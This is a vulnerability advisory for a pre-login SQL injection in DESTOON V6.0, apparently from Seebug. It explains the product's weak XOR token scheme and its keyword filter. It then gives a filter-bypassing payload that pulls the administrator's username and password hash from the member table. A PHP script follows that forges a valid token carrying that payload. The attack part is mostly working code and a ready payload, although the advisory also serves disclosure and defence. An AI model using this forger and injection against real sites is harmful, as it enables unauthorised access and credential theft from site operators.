# DESTOON V6.0 (2015-09-16) 前台无需登录的 SQL 注入一枚

2015-09-18T00:00:00
ID SSV:94502
Type seebug
Reporter Root
Modified 2015-09-18T00:00:00

## 1 算法剖析篇

```php
// Token scheme behind the $auth parameter decoded by the script in section 2.
// What encrypt() produces, before base64 and the character rewrite:
//   kecrypt( r0, p0^r0, r1, p1^r1, ... )
// where p = $txt followed by the first 3 bytes of $key, and r are bytes of a
// random pad that is shipped inside the token itself.
// NOTE(review): the only integrity check is that trailing 3-byte key prefix,
// appended as plaintext rather than computed over the message, so a token can
// be altered without invalidating it (section 1 and cracked() in section 2 show
// the consequence). Authenticating the token (a MAC over the ciphertext,
// compared in constant time) is the fix on the product side.
function encrypt($txt, $key = '') {
    $key or $key = DT_KEY;              // fall back to the site-wide key
    $rnd = random(32);                  // project helper; indexed 0..31 below, so a 32-char string is expected — TODO confirm
    $txt = $txt.substr($key, 0, 3);     // 3-byte tag that decrypt() checks
    $len = strlen($txt);
    $ctr = 0;
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $ctr = $ctr == 32 ? 0 : $ctr;   // pad index wraps every 32 bytes
        // emit the pad byte in the clear, then the plaintext byte XORed with it
        $str .= $rnd[$ctr].($txt[$i] ^ $rnd[$ctr++]);
    }
    // second XOR layer keyed by md5($key), then base64 with URL-unfriendly
    // sequences rewritten ('=' dropped, '+', '/', '0x', '0X' replaced)
    return str_replace(array('=', '+', '/', '0x', '0X'), array('', '-P-', '-S-', '-Z-', '-X-'), base64_encode(kecrypt($str, $key)));
}

// Inverse of encrypt(): undo the character rewrite and base64, strip the
// kecrypt() layer, fold each (pad, pad^byte) pair back into the byte, then
// verify the tag. Returns the plaintext without the tag, or '' on mismatch.
function decrypt($txt, $key = '') {
    $key or $key = DT_KEY;
    $txt = kecrypt(base64_decode(str_replace(array('-P-', '-S-', '-Z-', '-X-'), array('+', '/', '0x', '0X'), $txt)), $key);
    $len = strlen($txt);
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $tmp = $txt[$i];                // pad byte
        $str .= $txt[++$i] ^ $tmp;      // pad ^ (pad ^ byte) == byte
    }
    // Because the pad cancels here, each recovered byte depends on its
    // ciphertext pair only through the two md5($key) characters kecrypt()
    // applied at positions 2i%32 and (2i+1)%32 — a value that repeats every
    // 16 pairs.
    // NOTE(review): `==` is a loose comparison; `===` would avoid PHP's
    // numeric-string coercion when comparing the 3-byte tag.
    return substr($str, -3) == substr($key, 0, 3) ? substr($str, 0, -3) : '';
}

// Repeating-key XOR of $txt with the 32 hex characters of md5($key).
// XOR is its own inverse, so the same call both applies and removes the layer.
function kecrypt($txt, $key) {
    $key = md5($key);                   // 32-char hex string
    $len = strlen($txt);
    $ctr = 0;
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $ctr = $ctr == 32 ? 0 : $ctr;   // key index wraps every 32 bytes
        $str .= $txt[$i] ^ $key[$ctr++];
    }
    return $str;
}
```

`return substr(\$str, -3) == substr(\$key, 0, 3) ? substr(\$str, 0, -3) : '';`

（由于数学公式不好打，所以上传了图片 - -）

`(2x+6)%32=(2y+6)%32.`

## 2 WAF 绕过

```php
<?php
// Public endpoint: decrypts an $auth token into a tag() parameter string and
// echoes the rendered result as JavaScript. No login is involved; the gates
// are the referer check and the two filters below.
$_SERVER['REQUEST_URI'] = '';   // presumably so common.inc.php does not act on the real URL — TODO confirm
require '../common.inc.php';
header("Content-type:text/javascript");
check_referer() or exit('document.write("<h2>Invalid Referer</h2>");');
// $auth is not read from $_GET/$_POST here; it is expected to already be set
// by common.inc.php — TODO confirm where it is populated.
// strip_sql() runs on the *decrypted* value, so whatever it does not rewrite
// reaches tag() verbatim.
$tag = isset($auth) ? strip_sql(decrypt($auth)) : '';
$tag or exit('document.write("<h2>Bad Parameter</h2>");');
// Substring denylist on the decrypted string. strpos() is case-sensitive, so
// only exact lowercase occurrences of these tokens are rejected. Note the list
// holds the entity '&amp;', not a bare '&', so the '&' separators that
// parse_str() in tag() relies on are allowed through.
foreach(array($DT_PRE, '#', '$', '%', '&amp;', 'table', 'fields', 'password', 'payword', 'debug') as $v) {
    strpos($tag, $v) === false or exit('document.write("<h2>Bad Parameter</h2>");');
}
// tag() (excerpt below) parse_str()s $tag and extract()s the pieces straight
// into the SELECT it concatenates, so as far as this page shows the filters
// above are the only SQL-injection defence for this endpoint.
ob_start();
tag($tag);
$data = ob_get_contents();
ob_clean();
echo 'document.write(\''.dwrite($data ? $data : 'No Data or Bad Parameter').'\');';
?>
```

```function tag(\$parameter, \$expires = 0) { .....//省去无意义代码 parse_str(\$parameter, \$par); if(!is_array(\$par)) return ''; \$par = dstripslashes(\$par); extract(\$par, EXTR_SKIP); ...... \$order = \$order ? ' ORDER BY '.\$order : ''; ....... \$query = "SELECT ".\$fields." FROM ".\$table." WHERE ".\$condition.\$order." LIMIT ".\$offset.",".\$pagesize;```

```foreach(array(\$DT_PRE, '#', '\$', '%', '&amp;', 'table', 'fields', 'password', 'payword', 'debug') as \$v) { strpos(\$tag, \$v) === false or exit('document.write("&lt;h2&gt;Bad Parameter&lt;/h2&gt;");');```

```php
// Keyword denylist applied to tag() parameters before they are parsed.
// $type = 1: rewrite a fixed set of SQL keywords/functions so they no longer
//            read as SQL — one letter of each token is replaced by its HTML
//            entity (e.g. "union" -> "unio&#110;"). Arrays are filtered
//            element-wise via array_map; the callback gets one argument, so
//            nested calls always run with $type = 1.
// $type = 0: reverse the rewrite by mapping those entities back to letters.
// Matching is case-insensitive (/i). Statement keywords are only recognised
// when followed by one of [\s\*\/\-\(\+@] (or, for select, by a later "from"),
// function names only when followed by optional whitespace and "(". Any token
// not on the list passes unchanged — the usual limitation of a denylist; a
// parameterised query in the caller would remove the need for it.
function strip_sql($string, $type = 1) {
    $match = array(
        "/union/i","/where/i","/outfile/i","/dumpfile/i","/0x([a-f0-9]{2,})/i",
        "/select([\s\S]*?)from/i","/select([\s\*\/\-\(\+@])/i","/update([\s\*\/\-\(\+@])/i",
        "/replace([\s\*\/\-\(\+@])/i","/delete([\s\*\/\-\(\+@])/i","/drop([\s\*\/\-\(\+@])/i",
        "/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i",
        "/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/make_set[\s]*\(/i","/ascii[\s]*\(/i",
        "/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i"
    );
    // same order as $match; \\1 re-inserts the captured delimiter
    $replace = array(
        'unio&#110;','wher&#101;','outfil&#101;','dumpfil&#101;','0&#120;\\1',
        'selec&#116;\\1from','selec&#116;\\1','updat&#101;\\1',
        'replac&#101;\\1','delet&#101;\\1','dro&#112;\\1',
        'load_fil&#101;(','substrin&#103;(','subst&#114;(','lef&#116;(',
        'conca&#116;(','concat_w&#115;(','make_se&#116;(','asci&#105;(',
        'he&#120;(','or&#100;(','cha&#114;('
    );
    if($type) {
        return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);
    } else {
        // undo the mangling: entity -> letter
        return str_replace(array('&#100;', '&#101;', '&#103;', '&#105;', '&#110;','&#112;', '&#114;', '&#115;', '&#116;', '&#120;'), array('d', 'e', 'g', 'i', 'n', 'p', 'r', 's', 't', 'x'), $string);
    }
}
```

`pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1`

```php
<?php
// Proof of concept for the weakness described in section 1: given one known
// plaintext/token pair, build a token for a different plaintext. It works
// because the random pad is carried inside the token and cancels in decrypt(),
// leaving only the XOR of two md5($key) characters per byte, which repeats
// every 16 pairs, and because the trailing tag is not a MAC. Authenticating
// the token is the fix.
//   $Expressly   known plaintext (the writeup uses an e-mail address)
//   $Ciphertext  the token encrypt() produced for $Expressly
//   $str         plaintext to produce a token for
// Echoes the result in the same URL-safe encoding encrypt() uses.
function cracked($Expressly,$Ciphertext,$str){
    // undo encrypt()'s character rewrite and base64
    $Ciphertext=str_replace(array('-P-', '-S-', '-Z-', '-X-'),array('+', '/', '0x', '0X'),$Ciphertext);
    $Ciphertext = base64_decode($Ciphertext);
    $c=strlen($Ciphertext);
    $text2="a";          // constant stand-in for encrypt()'s random pad byte
    $j=0;                // index into the known token, two bytes per plaintext byte
    $s=0;                // index into the known plaintext
    // NOTE(review): $xxoo is never initialised before the .= below (PHP notice).
    for($i=0;$i<strlen($str);$i++,$s++){
        if($j==32){$j=0;$s=0;}   // after 16 pairs the key-pair XOR repeats, so restart from pair 0
        $tmp=$Ciphertext[$j]^$Ciphertext[$j+1];   // known pair folded: byte ^ K[2i%32] ^ K[(2i+1)%32]
        $tmp=$tmp^$Expressly[$s];                 // remove the known byte, leaving the key-pair XOR
        $tmp=$tmp^$str[$i];                       // apply it to the target byte
        $text1=$tmp^$text2;                       // mask with the chosen pad byte
        $xxoo =$xxoo.$text2.$text1;               // emit (pad, pad ^ masked byte) in encrypt()'s layout
        $j=$j+2;
    }
    // The 3-byte tag is lifted from the last three pairs of the known token and
    // re-padded with 'a'. Presumably the (2x+6)%32 == (2y+6)%32 relation in
    // section 1 is the condition under which it still verifies at its new
    // position — the writeup's image is not reproduced here, so unconfirmed.
    for($i=5;$i>=1;$i=$i-2){
        $tmp=$Ciphertext[$c-$i]^$Ciphertext[$c-$i-1]^'a';
        $xxoo = $xxoo.'a'.$tmp;
    }
    echo str_replace(array('+', '/', '0x', '0X'),array('-P-', '-S-', '-Z-', '-X-'),base64_encode($xxoo));
}
// Invocation as given in the writeup: known e-mail, the token obtained for it,
// and the tag() parameter string from section 2.
cracked("1111111111@qq.com","f018SggzVGUtHlo6J0ZaOg5rekJ6bnUGdQBgF1FhKURALgJiClMrTg",'pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1');
?>
```